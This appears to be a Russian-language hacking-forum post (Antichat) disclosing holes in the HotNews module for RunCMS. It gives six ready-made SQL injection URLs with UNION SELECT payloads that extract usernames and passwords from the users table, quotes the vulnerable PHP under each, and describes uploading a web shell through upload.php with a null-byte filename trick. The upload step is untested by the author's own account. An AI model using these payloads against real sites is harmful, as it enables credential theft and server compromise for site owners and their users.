|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
HotNews
Версия: 2
Уязвимый скрипт: rate.php
Запрос: /modules/HotNews/rate.php?tid=-1+union+select+1,pass+from+runcms_users
Уязвимый кусок кода:
PHP код:
if($HTTP_POST_VARS['submit']) {
........
} else {
include(XOOPS_ROOT_PATH."/header.php");
OpenTable();
$result=$db->query("SELECT cid, tname FROM ".$db->prefix("HotNews")." WHERE tid=$tid");
list($cid, $tname) = $db->fetch_row($result);
Уязвимый скрипт: index.php
Запрос: /modules/HotNews/?op=viewexttutorial&tid=-1+union+select+pass+from+runcms_users
Уязвимый кусок кода:
PHP код:
switch($op) {
case "viewexttutorial":
viewexttutorial();
break;
...........
function viewexttutorial() {
global $db, $xoopsTheme, $HTTP_GET_VARS, $framebrowse;
include(XOOPS_ROOT_PATH."/header.php");
$tid = $HTTP_GET_VARS['tid'];
$db->query("update ".$db->prefix("HotNews")." set hits=hits+1 where tid=$tid ");
OpenTable();
$result = $db->query("select tlink from ".$db->prefix("HotNews")." where tid=$tid ");
list($tlink) = $db->fetch_row($result);
Уязвимый скрипт: index.php
Запрос: /modules/HotNews/?op=viewtutorial&tid=-1+union+select+1,2,uname,4,pass,6,7,8,9+from+runcm s_users
Уязвимый кусок кода:
PHP код:
case "viewtutorial":
viewtutorial();
break;
...........
function viewtutorial() {
global $xoopsConfig, $xoopsUser, $db, $xoopsTheme, $HTTP_GET_VARS, $myts, $content_visdefault, $content_default, $content_visualize, $imgwidth, $imgheight, $framebrowse;
include(XOOPS_ROOT_PATH."/header.php");
$tid = $HTTP_GET_VARS['tid'];
if ($HTTP_GET_VARS['page']) {
$page = $HTTP_GET_VARS['page'];
} else {
$db->query("update ".$db->prefix("HotNews")." set hits=hits+1 where tid=$tid ");
}
OpenTable();
$result = $db->query("select tid, cid, tname, timg, tcont, tauthor, codes, hits, submitter from ".$db->prefix("HotNews")." where tid=$tid ");
list($tid, $cid, $tname, $timg, $tcont, $tauthor, $codes, $hits, $submitter) = $db->fetch_row($result);
Уязвимый скрипт: index.php
Запрос: /modules/HotNews/?op=listHotNews&cid=-1+union+select+1,pass,3+from+runcms_users
Уязвимый кусок кода:
PHP код:
case "listHotNews":
listHotNews();
break;
........
function listHotNews() {
global $xoopsConfig, $xoopsUser, $db, $xoopsTheme, $myts, $category_visdefault, $category_visualize, $category_default, $columnset, $imgwidth, $imgheight;
global $tutorial_visdefault, $tutorial_visualize, $tutorial_default, $HTTP_GET_VARS, $framebrowse;
include(XOOPS_ROOT_PATH."/header.php");
$cid = $HTTP_GET_VARS['cid'];
$xcid = $cid;
OpenTable();
$result = $db->query("select scid, cname, cimg from ".$db->prefix("HotNews_categorys")." where cid=$cid");
list($scid, $cname, $cimg) = $db->fetch_row($result);
Уязвимый скрипт: index.php
Запрос: /modules/HotNews/?op=printpage&tid=-1+union+select+1,2,pass,4+from+runcms_users
Уязвимый кусок кода:
PHP код:
case "printpage":
PrintTutPage();
break;
..........
function PrintTutPage() {
global $xoopsConfig, $xoopsUser, $db, $myts, $HTTP_GET_VARS, $imgwidth, $imgheight;
$tid = $HTTP_GET_VARS['tid'];
$result=$db->query("select tname, timg, tcont, codes from ".$db->prefix("HotNews")." where tid=$tid");
list($tname, $timg, $tcont, $codes) = $db->fetch_row($result);
Уязвимый скрипт: submit.php
Запрос: /modules/HotNews/submit.php?op=addTutorial&cid=-1+union+select+1,uname,pass,4+from+runcms_users
Уязвимый кусок кода:
PHP код:
case "addTutorial":
addTutorial();
break;
.........
function addTutorial(){
global $db, $xoopsConfig, $xoopsUser, $HTTP_GET_VARS, $myts, $xoopsTheme;
include(XOOPS_ROOT_PATH."/header.php");
$cid = $HTTP_GET_VARS["cid"];
$createdir = $HTTP_GET_VARS["createdir"];
// Add new Tutorial ------------------//
$result=$db->query("select scid, cname, cdesc, cimg from ".$db->prefix("HotNews_categorys")." where cid=$cid");
list($scid,$cname,$cdesc,$cimg) = $db->fetch_row($result);
Заливка шелла
Уязвимый скрипт: upload.php
Скрипт не проверяет типа файла \ расширение поэтому возможно можно залить шелл в папку images, либо в любую другую, передав соотвествующий путь в переменной img_path
( Хотя у меня на локале не заливались даже картинки, поэтому проверить не смог .. впрочем, если расширение и проверяется, то можно залить шелл с раширением .jpg, но img_path=/shell.php%00 )
|